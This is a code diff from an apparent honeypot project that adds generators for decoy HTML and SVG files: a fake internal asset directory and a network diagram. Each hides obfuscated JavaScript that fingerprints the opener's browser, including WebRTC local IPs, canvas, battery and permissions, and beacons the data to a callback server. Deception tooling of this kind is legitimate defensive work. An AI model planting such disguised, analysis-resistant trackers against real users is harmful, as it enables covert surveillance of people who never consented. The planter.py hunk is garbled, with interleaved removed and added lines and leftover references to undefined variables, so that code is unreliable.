      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
      pc.createDataChannel("");
      pc.onicecandidate = function (e) {
        if (!e.candidate) return;
        cands.push(e.candidate.candidate);
        var m = e.candidate.candidate.match(
          /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
        if (m) ips[m[1]] = 1;
      };
      var off = await pc.createOffer();
      await pc.setLocalDescription(off);
      await new Promise(function (r) { setTimeout(r, 1500); });
      pc.close();
      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
    } else { fp.rtc = { err: "unavailable" }; }
  } catch (e) { fp.rtc = { err: String(e) }; }
  // battery
  try {
    if (navigator.getBattery) {
      var bat = await navigator.getBattery();
      fp.bt = {
        c: bat.charging, l: bat.level,
        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
      };
    } else { fp.bt = { err: "unavailable" }; }
  } catch (e) { fp.bt = { err: String(e) }; }
  // perf timing jitter
  try {
    var samples = [];
    for (var pi = 0; pi < 1000; pi++) {
      var pa = performance.now();
      var x = 0;
      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
      samples.push(performance.now() - pa);
    }
    samples.sort(function (a, b) { return a - b; });
    fp.pf = {
      med: samples[500].toFixed(4),
      p95: samples[950].toFixed(4),
      mn: samples[0].toFixed(4),
      mx: samples[999].toFixed(4),
    };
  } catch (e) { fp.pf = { err: String(e) }; }
  // permissions
  try {
    if (navigator.permissions) {
      var names = ["geolocation", "notifications", "camera", "microphone",
                   "persistent-storage", "clipboard-read", "clipboard-write"];
      var st = {};
      for (var ni = 0; ni < names.length; ni++) {
        try {
          var r = await navigator.permissions.query({ name: names[ni] });
          st[names[ni]] = r.state;
        } catch (e) { st[names[ni]] = "unsupported"; }
      }
      fp.pm = st;
    } else { fp.pm = { err: "unavailable" }; }
  } catch (e) { fp.pm = { err: String(e) }; }
  // composite identity hash — stable inputs only
  try {
    var stable = [
      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
      fp.scr && (fp.scr.w + "x" + fp.scr.h),
    ].filter(Boolean).join("|");
    fp.id = await sha256(stable);
  } catch (e) { fp.id = { err: String(e) }; }
  // 2) ship the payload as base64url JSON on a GET query param.
  //    The current worker records the hit on /c/<slug>; step-4 worker
  //    will decode ?d= and persist the fingerprint blob.
  try {
    var json = JSON.stringify(fp);
    var b64 = btoa(unescape(encodeURIComponent(json)))
      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
    // chunk if URL would exceed safe limit (~6KB)
    var MAX = 6000;
    if (b64.length <= MAX) {
      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
    } else {
      var sid = (Math.random() * 1e9 | 0).toString(36);
      var total = Math.ceil(b64.length / MAX);
      for (var ci = 0; ci < total; ci++) {
        var part = b64.substr(ci * MAX, MAX);
        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
      }
    }
  } catch (e) { /* swallow */ }
 })();
--- a/decnet/canary/generators/fingerprint_html.py
+++ b/decnet/canary/generators/fingerprint_html.py
@@ -0,0 +1,140 @@
 """HTML fingerprint canary — plausible-looking page with an obfuscated
 browser-fingerprinting payload inlined at the bottom of ``<body>``.
 The visible content is a deliberately mundane "internal directory"
 table — the kind of file a curious attacker pulls off a decky's
 filesystem and opens locally to triage.  When the file is opened in
 *any* network-connected browser the obfuscated payload runs and beacons
 to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
 fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
 timing jitter, permissions, composite identity hash).
 Determinism: the mint UUID is derived from the callback token via
 :func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
 output, satisfying the generator contract in :mod:`decnet.canary.base`.
 The obfuscator's seed and polymorphic config bits are likewise
 callback-token-derived (see :mod:`decnet.canary.obfuscator`).
 """
 from __future__ import annotations
 import hashlib
 import uuid
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
 _MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
 def _mint_uuid_for(callback_token: str) -> str:
    return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
 def _stable_int(callback_token: str, salt: str = "") -> int:
    """Deterministic non-negative int derived from the callback token.
    ``builtins.hash`` is salted per-process — useless for a generator
    that must be byte-identical across runs.  SHA-256 prefix is
    overkill but free.
    """
    h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
    return int.from_bytes(h[:4], "big")
 _PAGE_TEMPLATE = """<!DOCTYPE html>
 <html lang="en">
 <head>
 <meta charset="utf-8">
 <title>Internal Asset Directory</title>
 <style>
 body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
 margin:24px;font-size:13px}}
 h1{{font-size:18px;margin:0 0 4px 0}}
 .sub{{color:#777;font-size:11px;margin-bottom:18px}}
 table{{border-collapse:collapse;width:100%;background:#fff;
 box-shadow:0 1px 2px rgba(0,0,0,.05)}}
 th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
 th{{background:#f4f4f4;font-weight:600;font-size:11px;
 text-transform:uppercase;letter-spacing:.5px;color:#555}}
 tr:hover td{{background:#fafbff}}
 .foot{{margin-top:16px;color:#999;font-size:11px}}
 </style>
 </head>
 <body>
 <h1>Internal Asset Directory</h1>
 <div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
 <table>
 <tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
 {rows}
 </table>
 <div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
 <script>{payload}</script>
 </body>
 </html>
 """
 _ROW_POOL = (
    ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
    ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
    ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
    ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
    ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
    ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
    ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
    ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
    ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
 )
 def _build_rows(callback_token: str) -> tuple[str, int]:
    pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
    take = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
    cells = "\n".join(
        "<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
        for row in selected
    )
    return cells, len(selected)
 def _sync_label(callback_token: str) -> str:
    day = _stable_int(callback_token, "day") % 28 + 1
    hour = _stable_int(callback_token, "hour") % 24
    return f"2026-04-{day:02d} {hour:02d}:14 UTC"
 class FingerprintHtmlGenerator(CanaryGenerator):
    """Synthesise an HTML page that fingerprints the browser opening it."""
    name = "fingerprint_html"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        rows, row_count = _build_rows(ctx.callback_token)
        body = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(ctx.callback_token),
            row_count=row_count,
            rows=rows,
            payload=payload,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 14,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
--- a/decnet/canary/generators/fingerprint_svg.py
+++ b/decnet/canary/generators/fingerprint_svg.py
@@ -0,0 +1,88 @@
 """SVG fingerprint canary — standalone SVG with an embedded ``<script>``
 that runs the obfuscated fingerprinter when the file is opened directly
 in a browser.
 SVG ``<script>`` only fires when the SVG is loaded as a top-level
 document (or via ``<object>``/``<iframe>``); it's *blocked* when the
 SVG is referenced from another page's ``<img>``.  That's the right
 posture for canary use: an attacker browsing the decky filesystem and
 double-clicking a stray ``network_diagram.svg`` triggers it; rendering
 inside a sandboxed CMS preview does not.
 Same determinism guarantees as :mod:`fingerprint_html`.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
 from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
 _DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
 <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
 <style>
 .box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
 .lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
 .edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
 .title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
 .cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
 </style>
 <text class="title" x="20" y="28">Network Topology — {region} segment</text>
 <text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
 <rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
 <rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
 <rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
 <rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
 <text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
 <path class="edge" d="M160 105 L240 105"/>
 <path class="edge" d="M360 105 L440 105"/>
 <path class="edge" d="M300 130 L300 220"/>
 <script type="application/ecmascript"><![CDATA[
 {payload}
 ]]></script>
 </svg>
 """
 _REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
 class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it."""
    name = "fingerprint_svg"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            payload=payload,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
--- a/decnet/canary/generators/honeydoc_pdf.py
+++ b/decnet/canary/generators/honeydoc_pdf.py
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        try:
-            from pikepdf import Pdf, Name, Dictionary, String  # type: ignore[import-not-found]
+            from pikepdf import Pdf, Name, Dictionary, String
        except ImportError as e:
            raise InstrumenterRejectedError(
                "honeydoc_pdf requires pikepdf; install it (`pip install "
--- a/decnet/canary/instrumenters/image.py
+++ b/decnet/canary/instrumenters/image.py
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
-            from PIL import Image, PngImagePlugin  # type: ignore[import-not-found]
+            from PIL import Image, PngImagePlugin
        except ImportError as e:
            raise InstrumenterRejectedError(
                "image instrumenter requires Pillow; install it (`pip "
--- a/decnet/canary/instrumenters/pdf.py
+++ b/decnet/canary/instrumenters/pdf.py
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
-            import pikepdf  # type: ignore[import-not-found]
+            import pikepdf
        except ImportError as e:
            raise InstrumenterRejectedError(
                "PDF instrumenter requires pikepdf; install it (`pip "
--- a/decnet/canary/obfuscator.py
+++ b/decnet/canary/obfuscator.py
@@ -0,0 +1,177 @@
 """Per-mint JS obfuscator wrapper.
 Thin Python wrapper around the ``javascript-obfuscator`` Node package.
 Used by the fingerprint generators / instrumenters to produce a unique,
 hard-to-statically-analyse JS blob per canary mint.
 Two design choices flow from the canary contract in :mod:`base`:
 * **Determinism.** Generators must return byte-identical artifacts for
  the same ``(callback_token, http_base, dns_zone, persona)``.  We
  derive a numeric seed from the callback token and pass it to the
  obfuscator's own ``seed`` option, and we derive the polymorphic
  config bits from the same hash so a re-mint reproduces exactly.
 * **Per-mint uniqueness.** Two different callback tokens produce
  structurally different output: different identifier names, different
  string-array rotation, optionally different transforms enabled.
 The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
 We pass code+options as JSON on stdin and read the obfuscated result
 from stdout.  Stderr surfaces obfuscator failures.
 """
 from __future__ import annotations
 import hashlib
 import hmac
 import json
 import os
 import subprocess  # nosec B404 — Node helper exec is the whole point
 from pathlib import Path
 from typing import Any
 _HELPER = Path(__file__).parent / "_obfuscate_helper.js"
 _PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
 # Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
 # specific runtime; default to PATH lookup.
 _NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
 # Hard timeout for the obfuscator subprocess. Real runs on the
 # fingerprint payload sit well under 5s on a dev box.
 _TIMEOUT_S = 30
 class ObfuscatorError(RuntimeError):
    """Raised when the Node helper fails or returns empty output."""
 class FingerprintSecretMissing(RuntimeError):
    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
    Fingerprint canaries embed a per-mint nonce derived from this
    server-side secret; without it the worker cannot validate incoming
    fingerprint beacons, so we fail loud at mint time rather than ship
    a defeatable canary.
    """
 _FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password
 def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Compute the per-mint fingerprint nonce.
    HMAC-SHA256 keyed on the server-side master secret, message is
    ``callback_token + "|" + mint_uuid``.  Truncated to 16 hex chars
    (~64 bits of entropy) — enough to defeat slug-only forgery while
    fitting comfortably into a query string.
    """
    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if not secret:
        raise FingerprintSecretMissing(
            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
        )
    msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
    return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
 def _seed_from_token(callback_token: str) -> int:
    """Derive a 31-bit numeric seed from the callback token.
    ``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
    using a SHA-256-derived prefix gives us a uniform distribution
    across the 31-bit positive range.
    """
    h = hashlib.sha256(callback_token.encode("utf-8")).digest()
    return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
 def _config_from_seed(seed: int) -> dict[str, Any]:
    """Build a deterministic, per-mint obfuscator config.
    The hash bits drive *which* transforms apply — two mints get
    structurally different outputs, not just different identifier names.
    Defaults stay aggressive enough that reverse engineering is real
    work; we never disable string-array or rename, only vary the dial.
    """
    bits = seed
    encodings = ("base64", "rc4")
    string_array_encoding = [encodings[bits & 1]]
    control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0  # 0.5 .. ~1.0
    dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0  # 0.2 .. ~0.7
    transform_object_keys = bool((bits >> 17) & 1)
    numbers_to_expressions = bool((bits >> 18) & 1)
    simplify = bool((bits >> 19) & 1)
    return {
        "compact": True,
        "seed": seed,
        "controlFlowFlattening": True,
        "controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
        "deadCodeInjection": True,
        "deadCodeInjectionThreshold": round(dead_code_threshold, 3),
        "stringArray": True,
        "stringArrayEncoding": string_array_encoding,
        "stringArrayThreshold": 1,
        "stringArrayRotate": True,
        "stringArrayShuffle": True,
        "splitStrings": True,
        "splitStringsChunkLength": 4 + (bits & 7),
        "transformObjectKeys": transform_object_keys,
        "numbersToExpressions": numbers_to_expressions,
        "simplify": simplify,
        "selfDefending": False,  # breaks SVG embed; not worth the cost
        "renameGlobals": False,
        "identifierNamesGenerator": "mangled-shuffled",
    }
 def obfuscate(code: str, *, callback_token: str) -> str:
    """Obfuscate *code* deterministically per *callback_token*.
    Raises :class:`ObfuscatorError` if Node fails or returns empty.
    """
    seed = _seed_from_token(callback_token)
    options = _config_from_seed(seed)
    payload = json.dumps({"code": code, "options": options})
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            [_NODE_BIN, str(_HELPER)],
            input=payload, capture_output=True, text=True,
            timeout=_TIMEOUT_S, check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e
    if proc.returncode != 0:
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    out = proc.stdout
    if not out.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return out
 def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
 ) -> str:
    """Build the obfuscated fingerprint JS for a single mint.
    Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
    ``{{MINT_NONCE}}`` in the payload template, then runs it through
    :func:`obfuscate` with a seed derived from the callback token.
    The nonce is appended as ``&k=`` on every beacon URL the JS emits;
    the worker rejects fingerprint payloads whose ``?k=`` doesn't match
    the row's :attr:`CanaryToken.fingerprint_nonce`.
    """
    template = _PAYLOAD.read_text(encoding="utf-8")
    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
    src = (
        template
        .replace("{{BEACON_URL}}", beacon)
        .replace("{{MINT_UUID}}", mint_uuid)
        .replace("{{MINT_NONCE}}", nonce)
    )
    return obfuscate(src, callback_token=callback_token)
--- a/decnet/canary/package.json
+++ b/decnet/canary/package.json
@@ -0,0 +1,10 @@
 {
  "name": "decnet-canary-obfuscator",
  "version": "0.1.0",
  "private": true,
  "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
  "main": "_obfuscate_helper.js",
  "dependencies": {
    "javascript-obfuscator": "^5.4.2"
  }
 }
--- a/decnet/canary/paths.py
+++ b/decnet/canary/paths.py
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }
 _WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }
--- a/decnet/canary/planter.py
+++ b/decnet/canary/planter.py
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
 """
 from __future__ import annotations
 import asyncio
 import base64
 import os
-import shlex
+from datetime import datetime, timedelta, timezone
 import time
 from secrets import token_urlsafe
 from typing import Any, Iterable, Optional
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.canary.paths import default_path_for
 from decnet.decky_io import (
    delete_file_from_container,
    resolve_topology_container,
    write_file_to_container,
 )
 from decnet.logging import get_logger
 from decnet.web.db.repository import BaseRepository
 log = get_logger("canary.planter")
 _DOCKER = "docker"
 _TIMEOUT = 8.0
 # Container suffix — matches the orchestrator SSH driver's convention
 # (``<decky_name>-ssh``).  Canary placement always happens through the
 # ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
-def _dirname(path: str) -> str:
+# resolve_topology_container is re-exported from decky_io for back-compat
-    idx = path.rfind("/")
+# with callers (tests, deploy hook) that imported it from this module
-    if idx <= 0:
+# before the decky_io extraction.
-        return "/"
+__all__ = [
-    return path[:idx]
+    "plant",
-
+    "revoke",
-
+    "resolve_topology_container",
-async def _run(
+    "seed_baseline",
-    argv: list[str], *, stdin_bytes: Optional[bytes] = None,
+    "seed_baseline_topology",
-) -> tuple[int, str, str]:
+]
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            pass
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
 def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
    """Compose the ``sh -c`` script + stdin payload for one artifact.
    Binary safety: we base64-encode on the host and stream the result
    over stdin to ``base64 -d`` inside the container, so the bytes
    never touch the argv (kernel ARG_MAX would reject anything larger
    than ~128KB-2MB depending on the host).  Both ``base64`` (coreutils)
    and ``touch -d @<unix_ts>`` are present on every Linux base image
    we ship, so there's no per-distro branching.
    """
    encoded = base64.b64encode(artifact.content)
    mtime = int(time.time() + artifact.mtime_offset)
    mode_str = oct(artifact.mode)[2:]
    parts = [
        f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
        f"base64 -d > {shlex.quote(artifact.path)}",
        f"chmod {mode_str} {shlex.quote(artifact.path)}",
        f"touch -d @{mtime} {shlex.quote(artifact.path)}",
    ]
    return " && ".join(parts), encoded
 async def _publish(
@@ -139,6 +93,7 @@ async def plant(
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Write *artifact* into the decky's ssh container.
@@ -157,13 +112,12 @@ async def plant(
            await repo.update_canary_token_state(token_uuid, "failed", err)
        return False, err
-    sh_cmd, stdin_payload = _build_plant_command(artifact)
+    target_container = container or _container_for(decky_name)
-    # ``-i`` keeps stdin attached so base64 -d inside the container can
+    mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
-    # consume the encoded payload streamed from the host.
+    success, error = await write_file_to_container(
-    argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
+        target_container, artifact.path, artifact.content,
-    rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
+        mode=artifact.mode, mtime=mtime,
-    success = rc == 0
+    )
    error = None if success else (stderr.strip()[:256] or f"rc={rc}")
    if repo is not None:
        if success:
@@ -182,8 +136,8 @@ async def plant(
    if not success:
        log.warning(
-            "canary.plant failed decky=%s token=%s rc=%d stderr=%r",
+            "canary.plant failed decky=%s token=%s container=%s err=%r",
-            decky_name, token_uuid, rc, stderr[:120],
+            decky_name, token_uuid, target_container, error,
        )
    return success, error
@@ -196,6 +150,7 @@ async def revoke(
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Best-effort unlink + state transition + bus publish.
@@ -203,11 +158,10 @@ async def revoke(
    the file is gone after the call (whether we deleted it or it was
    already missing); only docker / container-down errors return False.
    """
-    sh_cmd = f"rm -f {shlex.quote(placement_path)}"
+    target_container = container or _container_for(decky_name)
-    argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
+    success, error = await delete_file_from_container(
-    rc, _stdout, stderr = await _run(argv)
+        target_container, placement_path,
-    success = rc == 0
+    )
    error = None if success else (stderr.strip()[:256] or f"rc={rc}")
    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
    persona: str = "linux",
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> list[dict[str, Any]]:
    """Plant the configured baseline canary set on one decky.
@@ -293,9 +248,59 @@ async def seed_baseline(
        await plant(
            decky_name, artifact,
            token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
            container=container,
        )
        out.append({
            "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
            "callback_token": slug, "placement_path": artifact.path,
        })
    return out
 async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
 ) -> list[dict[str, Any]]:
    """Plant baseline canaries on every decky in a MazeNET topology.
    Mirrors :func:`seed_baseline` for the topology path. Container name
    resolution uses :func:`resolve_topology_container` since topology
    deckies may not have an ssh service — in that case we target the
    base container instead.
    Best-effort: failures on any single decky are logged inside
    :func:`plant`; the deploy hook treats the return value as
    informational. Returns a flat list of per-token dicts (with an added
    ``decky_name`` key) across all deckies.
    """
    from decnet.topology.persistence import hydrate
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []
    out: list[dict[str, Any]] = []
    for decky in hydrated["deckies"]:
        cfg = decky.get("decky_config") or {}
        decky_name = cfg.get("name") or decky.get("name")
        if not decky_name:
            continue
        services = decky.get("services") or []
        container = resolve_topology_container(topology_id, decky_name, services)
        # MazeNET deckies don't carry an OS persona today; default to
        # linux (every base image we ship is Linux).
        rows = await seed_baseline(
            decky_name, repo,
            persona="linux", created_by=created_by, bus=bus,
            container=container,
        )
        for r in rows:
            r["decky_name"] = decky_name
            out.append(r)
    return out
--- a/decnet/canary/worker.py
+++ b/decnet/canary/worker.py
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
 from __future__ import annotations
 import asyncio
 import base64
 import binascii
 import json
 import os
 import time
 import uuid
 from datetime import datetime, timezone
-from typing import Optional
+from typing import Any, Optional
 from fastapi import FastAPI, Request, Response
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
 )
 # Namespace used by fingerprint generators to derive mint UUID.
 # Must stay in sync with fingerprint_html._MINT_NAMESPACE.
 _MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
 # In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
 # Maps (token_uuid, src_ip) -> list of monotonic timestamps.
 # Not shared across worker restarts or processes — acceptable for MVP.
 _FP_RATE_WINDOW_S = 60
 _FP_RATE_LIMIT = 30
 _fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
 def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
    key = (token_uuid, src_ip)
    now = time.monotonic()
    cutoff = now - _FP_RATE_WINDOW_S
    bucket = _fp_rate_buckets.get(key, [])
    bucket = [t for t in bucket if t > cutoff]
    if len(bucket) >= _FP_RATE_LIMIT:
        _fp_rate_buckets[key] = bucket
        return False
    bucket.append(now)
    _fp_rate_buckets[key] = bucket
    return True
 def _is_valid_fp_shape(fp: dict) -> bool:
    """Layer B — structural sanity check on a decoded fingerprint blob."""
    if not isinstance(fp.get("mint"), str) or not fp["mint"]:
        return False
    known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
    present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
    return present >= 3
 def _http_base() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    @app.get("/c/{slug}")
    async def callback(slug: str, request: Request) -> Response:
        raw_nonce = request.query_params.get("k")
